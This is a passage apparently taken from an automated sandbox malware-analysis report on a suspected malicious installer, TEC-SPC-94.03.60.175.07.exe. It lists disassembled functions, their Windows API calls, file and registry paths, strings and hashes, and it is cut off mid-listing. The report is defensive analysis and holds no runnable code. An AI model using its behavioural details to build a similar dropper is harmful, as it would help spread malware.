                                                          • Associated: 00000000.00000002.2352361566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352612399.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                          • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsrF34D.tmp\System.dll
                                                          • API String ID: 2531174081-2218645355
                                                          • Opcode ID: 241caa620ce1fcc58b3a3595d79cd8debb0f013b3e7c164dabd01d0a25878295
                                                          • Instruction ID: 09d17c59ce7287a2cbf3dc662f19c44123261f726eb293d34c68041fb2ac0666
                                                          • Opcode Fuzzy Hash: 241caa620ce1fcc58b3a3595d79cd8debb0f013b3e7c164dabd01d0a25878295
                                                          • Instruction Fuzzy Hash: CA21A131900558BBCB219FA5DD849DFBFB8EF54310F14807AF904B62A0C3798A81CFA8
                                                          Function 00402573 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 142fileCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 625 402573-402588 call 402b1d 628 4029c7-4029ca 625->628 629 40258e-402595 625->629 630 4029d0-4029d6 628->630 631 402597 629->631 632 40259a-40259d 629->632 631->632 634 4025a3-4025b2 call 405ea8 632->634 635 4026e6-4026ee 632->635 634->635 638 4025b8 634->638 635->628 639 4025be-4025c2 638->639 640 402657-402667 call 405c37 639->640 641 4025c8-4025e3 ReadFile 639->641 640->635 648 402669 640->648 641->635 642 4025e9-4025ee 641->642 642->635 644 4025f4-402602 642->644 646 4026a2-4026ae call 405e8f 644->646 647 402608-40261a MultiByteToWideChar 644->647 646->630 647->648 650 40261c-40261f 647->650 651 40266c-40266f 648->651 653 402621-40262c 650->653 651->646 654 402671-402676 651->654 653->651 655 40262e-402653 SetFilePointer MultiByteToWideChar 653->655 656 4026b3-4026b7 654->656 657 402678-40267d 654->657 655->653 660 402655 655->660 658 4026d4-4026e0 SetFilePointer 656->658 659 4026b9-4026bd 656->659 657->656 661 40267f-402692 657->661 658->635 663 4026c5-4026d2 659->663 664 4026bf-4026c3 659->664 660->648 661->635 662 402694-40269a 661->662 662->639 665 4026a0 662->665 663->635 664->658 664->663 665->635
                                                          APIs
                                                          • ReadFile.KERNELBASE(?,?,?,?), ref: 004025DB
                                                          • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402616
                                                          • SetFilePointer.KERNELBASE(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402639
                                                          • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 0040264F
                                                            • Part of subcall function 00405C37: ReadFile.KERNELBASE(00409230,00000000,00000000,00000000,00000000,00413E90,0040BE90,0040330C,00409230,00409230,004031FE,00413E90,00004000,?,00000000,?), ref: 00405C4B
                                                            • Part of subcall function 00405E8F: wsprintfW.USER32 ref: 00405E9C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2352288638.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2352270908.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352340381.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352612399.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: File$ByteCharMultiReadWide$Pointerwsprintf
                                                          • String ID: 9
                                                          • API String ID: 1149667376-2366072709
                                                          • Opcode ID: 14d7a1a443259207830479a75009ee39c6dacd7ae2e8022bb32dc9fb2f0741b6
                                                          • Instruction ID: 34008a6f5bb5370994306dbe4266d00811a1d2e87b5126a94146f67fdcf6739f
                                                          • Opcode Fuzzy Hash: 14d7a1a443259207830479a75009ee39c6dacd7ae2e8022bb32dc9fb2f0741b6
                                                          • Instruction Fuzzy Hash: 0E51E771E04209ABDF24DF94DE88AAEB779FF04304F50443BE511B62D0D7B99A42CB69
                                                          Function 004015B9 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 666 4015b9-4015cd call 402b3a call 405a3e 671 401614-401617 666->671 672 4015cf-4015eb call 4059c0 CreateDirectoryW 666->672 674 401646-402197 call 401423 671->674 675 401619-401638 call 401423 call 405f48 SetCurrentDirectoryW 671->675 679 40160a-401612 672->679 680 4015ed-4015f8 GetLastError 672->680 688 402793-40279a 674->688 689 4029c7-4029d6 674->689 675->689 690 40163e-401641 675->690 679->671 679->672 683 401607 680->683 684 4015fa-401605 GetFileAttributesW 680->684 683->679 684->679 684->683 688->689 690->689
                                                          APIs
                                                            • Part of subcall function 00405A3E: CharNextW.USER32(?,?,00424EF0,?,00405AB2,00424EF0,00424EF0,?,?,76232EE0,004057F0,?,C:\Users\user\AppData\Local\Temp\,76232EE0,"C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe"), ref: 00405A4C
                                                            • Part of subcall function 00405A3E: CharNextW.USER32(00000000), ref: 00405A51
                                                            • Part of subcall function 00405A3E: CharNextW.USER32(00000000), ref: 00405A69
                                                          • CreateDirectoryW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 004015E3
                                                          • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015ED
                                                          • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 004015FD
                                                          • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy,?,00000000,000000F0), ref: 00401630
                                                          Strings
                                                          • C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy, xrefs: 00401623
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2352288638.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2352270908.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352340381.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352612399.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                                          • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy
                                                          • API String ID: 3751793516-3249457974
                                                          • Opcode ID: 9b673ddbf1d69572a6be76a75328456f52fe096521e7ed3c2b5c74dd951979b8
                                                          • Instruction ID: 602e027c19ef8137931421d3e2870900c2c1aa36f58208ee64056e3add0ea48c
                                                          • Opcode Fuzzy Hash: 9b673ddbf1d69572a6be76a75328456f52fe096521e7ed3c2b5c74dd951979b8
                                                          • Instruction Fuzzy Hash: 4F11C271904200EBCF206FA0CD449AE7AB4FF14369B34463BF881B62E1D23D49419A6E
                                                          Function 00402B7A Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 693 402b7a-402ba3 RegOpenKeyExW 694 402ba5-402bb0 693->694 695 402c0e-402c12 693->695 696 402bcb-402bdb RegEnumKeyW 694->696 697 402bb2-402bb5 696->697 698 402bdd-402bef RegCloseKey call 4062b2 696->698 699 402c02-402c05 RegCloseKey 697->699 700 402bb7-402bc9 call 402b7a 697->700 706 402bf1-402c00 698->706 707 402c15-402c1b 698->707 704 402c0b-402c0d 699->704 700->696 700->698 704->695 706->695 707->704 708 402c1d-402c2b RegDeleteKeyW 707->708 708->704 709 402c2d 708->709 709->695
                                                          APIs
                                                          • RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?), ref: 00402B9B
                                                          • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402BD7
                                                          • RegCloseKey.ADVAPI32(?), ref: 00402BE0
                                                          • RegCloseKey.ADVAPI32(?), ref: 00402C05
                                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402C23
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2352288638.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2352270908.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352340381.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352612399.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: Close$DeleteEnumOpen
                                                          • String ID:
                                                          • API String ID: 1912718029-0
                                                          • Opcode ID: b547f4a97addcc1e8c82d95905b84b8973278d2723117ef79469a300e8f1f4e9
                                                          • Instruction ID: 39c85bfe7ca74ada2351cc0a51ccebcd1f3e21716521df4e7e96f28c7df0de5f
                                                          • Opcode Fuzzy Hash: b547f4a97addcc1e8c82d95905b84b8973278d2723117ef79469a300e8f1f4e9
                                                          • Instruction Fuzzy Hash: 5B116A31904008FEEF229F90DE89EAE3B7DFB14348F100476FA01B00A0D3B59E51EA69
                                                          Function 10001759 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 118COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 711 10001759-10001795 call 10001b18 715 100018a6-100018a8 711->715 716 1000179b-1000179f 711->716 717 100017a1-100017a7 call 10002286 716->717 718 100017a8-100017b5 call 100022d0 716->718 717->718 723 100017e5-100017ec 718->723 724 100017b7-100017bc 718->724 725 1000180c-10001810 723->725 726 100017ee-1000180a call 100024a9 call 100015b4 call 10001272 GlobalFree 723->726 727 100017d7-100017da 724->727 728 100017be-100017bf 724->728 732 10001812-1000184c call 100015b4 call 100024a9 725->732 733 1000184e-10001854 call 100024a9 725->733 748 10001855-10001859 726->748 727->723 734 100017dc-100017dd call 10002b5f 727->734 730 100017c1-100017c2 728->730 731 100017c7-100017c8 call 100028a4 728->731 736 100017c4-100017c5 730->736 737 100017cf-100017d5 call 10002645 730->737 743 100017cd 731->743 732->748 733->748 746 100017e2 734->746 736->723 736->731 752 100017e4 737->752 743->746 746->752 753 10001896-1000189d 748->753 754 1000185b-10001869 call 1000246c 748->754 752->723 753->715 759 1000189f-100018a0 GlobalFree 753->759 761 10001881-10001888 754->761 762 1000186b-1000186e 754->762 759->715 761->753 764 1000188a-10001895 call 1000153d 761->764 762->761 763 10001870-10001878 762->763 763->761 765 1000187a-1000187b FreeLibrary 763->765 764->753 765->761
                                                          APIs
                                                            • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D83
                                                            • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D88
                                                            • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D8D
                                                          • GlobalFree.KERNEL32(00000000), ref: 10001804
                                                          • FreeLibrary.KERNEL32(?), ref: 1000187B
                                                          • GlobalFree.KERNEL32(00000000), ref: 100018A0
                                                            • Part of subcall function 10002286: GlobalAlloc.KERNEL32(00000040,00001020), ref: 100022B8
                                                            • Part of subcall function 10002645: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,100017D5,00000000), ref: 100026B7
                                                            • Part of subcall function 100015B4: lstrcpyW.KERNEL32(00000000,10004020,00000000,10001731,00000000), ref: 100015CD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2371509767.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000000.00000002.2371482983.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000000.00000002.2371555156.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000000.00000002.2371583755.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10000000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: Global$Free$Alloc$Librarylstrcpy
                                                          • String ID:
                                                          • API String ID: 1791698881-3916222277
                                                          • Opcode ID: d19b98991503ed1f4222ee02892706a0c20354a75bd4722b3fc13797bb1a772f
                                                          • Instruction ID: d353a68b508970880cf9150dbe01e0f77130c4103e9cfdf2e47557ee24e57a3c
                                                          • Opcode Fuzzy Hash: d19b98991503ed1f4222ee02892706a0c20354a75bd4722b3fc13797bb1a772f
                                                          • Instruction Fuzzy Hash: 5E31BF75804241AAFB14DF749CC9BDA37E8FF053D0F158065FA0A9A08FDF74A9848761
                                                          Function 00405E15 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45registryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 768 405e15-405e47 RegOpenKeyExW 769 405e89-405e8c 768->769 770 405e49-405e68 RegQueryValueExW 768->770 771 405e76 770->771 772 405e6a-405e6e 770->772 774 405e79-405e83 RegCloseKey 771->774 773 405e70-405e74 772->773 772->774 773->771 773->774 774->769
                                                          APIs
                                                          • RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?,00000002,Call,?,00406088,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405E3F
                                                          • RegQueryValueExW.KERNELBASE(?,?,00000000,?,?,?,?,00406088,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405E60
                                                          • RegCloseKey.ADVAPI32(?,?,00406088,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405E83
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2352288638.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2352270908.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352340381.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352612399.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: CloseOpenQueryValue
                                                          • String ID: Call
                                                          • API String ID: 3677997916-1824292864
                                                          • Opcode ID: 6d49e1ec12a7b24cc87819d5cf70687d25a5c21dfc25d1df192b84af38ef9460
                                                          • Instruction ID: 600534e839ec184522a2ed62e812a695e1e378dc1a2fe7ff70d8343822b3fb0e
                                                          • Opcode Fuzzy Hash: 6d49e1ec12a7b24cc87819d5cf70687d25a5c21dfc25d1df192b84af38ef9460
                                                          • Instruction Fuzzy Hash: A7015A3114020EEACB218F56EC08EEB3BA8EF54390F00413AF944D2220D334DA64CBE5
                                                          Function 00405BE3 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 775 405be3-405bef 776 405bf0-405c24 GetTickCount GetTempFileNameW 775->776 777 405c33-405c35 776->777 778 405c26-405c28 776->778 780 405c2d-405c30 777->780 778->776 779 405c2a 778->779 779->780
                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 00405C01
                                                          • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,00403358,1033,C:\Users\user\AppData\Local\Temp\), ref: 00405C1C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2352288638.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2352270908.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352340381.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352612399.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: CountFileNameTempTick
                                                          • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                          • API String ID: 1716503409-1857211195
                                                          • Opcode ID: c429582aea5e4f3fae6c397ed87dacf02ee6c580567254a7da4e12ab8597e880
                                                          • Instruction ID: 094b443934c56d738417ad06ce23117a41e39d67b54f0ae1535361756efc6c0b
                                                          • Opcode Fuzzy Hash: c429582aea5e4f3fae6c397ed87dacf02ee6c580567254a7da4e12ab8597e880
                                                          • Instruction Fuzzy Hash: 45F09676A04208BBDB009F59DC05E9BB7B8EB91710F10803AEA01E7151E2B0AD448B54
                                                          Function 0040317D Relevance: 6.1, APIs: 4, Instructions: 108fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 00403192
                                                            • Part of subcall function 0040330F: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FE7,?), ref: 0040331D
                                                          • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,?,00403095,00000004,00000000,00000000,?,?,?,0040300E,000000FF,00000000,00000000), ref: 004031C5
                                                          • WriteFile.KERNELBASE(0040BE90,0040F4C3,00000000,00000000,00413E90,00004000,?,00000000,?,00403095,00000004,00000000,00000000,?,?), ref: 0040327F
                                                          • SetFilePointer.KERNELBASE(00004D6A,00000000,00000000,00413E90,00004000,?,00000000,?,00403095,00000004,00000000,00000000,?,?,?,0040300E), ref: 004032D1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2352288638.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2352270908.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352340381.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352612399.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: File$Pointer$CountTickWrite
                                                          • String ID:
                                                          • API String ID: 2146148272-0
                                                          • Opcode ID: 38246e7ae17352d7cedfc7595443620c434811b06811d2a86a618e437c7072d2
                                                          • Instruction ID: 34320a24581f7621071559271f75aff2a33e70c32c739a51ea230fcf3b1a2f41
                                                          • Opcode Fuzzy Hash: 38246e7ae17352d7cedfc7595443620c434811b06811d2a86a618e437c7072d2
                                                          • Instruction Fuzzy Hash: CB418B72504205DFDB109F29EE84AA63BADF74431671441BFE604B22E1C7B96D418BEC
                                                          Function 00403326 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 004061DC: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,76233420,00403542), ref: 0040623F
                                                            • Part of subcall function 004061DC: CharNextW.USER32(?,?,?,00000000), ref: 0040624E
                                                            • Part of subcall function 004061DC: CharNextW.USER32(?,"C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,76233420,00403542), ref: 00406253
                                                            • Part of subcall function 004061DC: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,76233420,00403542), ref: 00406266
                                                          • CreateDirectoryW.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76233420,00403542), ref: 00403347
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2352288638.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2352270908.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352340381.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352612399.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: Char$Next$CreateDirectoryPrev
                                                          • String ID: 1033$C:\Users\user\AppData\Local\Temp\
                                                          • API String ID: 4115351271-3512041753
                                                          • Opcode ID: bbd1dcb3637595afbe6b96ae3bcfafd58112e7b3325432cb54e87bfcccc6df60
                                                          • Instruction ID: 64a45b222adfb8bd76fd8b495f2d7cf88aee328212c381153bc1e0c9699f7593
                                                          • Opcode Fuzzy Hash: bbd1dcb3637595afbe6b96ae3bcfafd58112e7b3325432cb54e87bfcccc6df60
                                                          • Instruction Fuzzy Hash: 22D0C92251AA3135C551372A7D06FCF295C8F0A329F12A477F809B90C2CB7C2A8249FE
                                                          Function 004069D2 Relevance: 5.2, APIs: 4, Instructions: 236COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2352288638.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2352270908.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352340381.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352612399.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ba6317b19b7b230722eb11252d44c293277e5dc1cbca2e551617393c5194c9d0
                                                          • Instruction ID: dca007468fed7c27dd914b546e5ea1ac9ab056a0c62ecf1bea7b7831388965f7
                                                          • Opcode Fuzzy Hash: ba6317b19b7b230722eb11252d44c293277e5dc1cbca2e551617393c5194c9d0
                                                          • Instruction Fuzzy Hash: 58A14471E00229DBDF28CFA8C8447ADBBB1FF48305F15816AD856BB281C7785A96CF44
                                                          Function 00406BD3 Relevance: 5.2, APIs: 4, Instructions: 208COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2352288638.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2352270908.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352340381.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
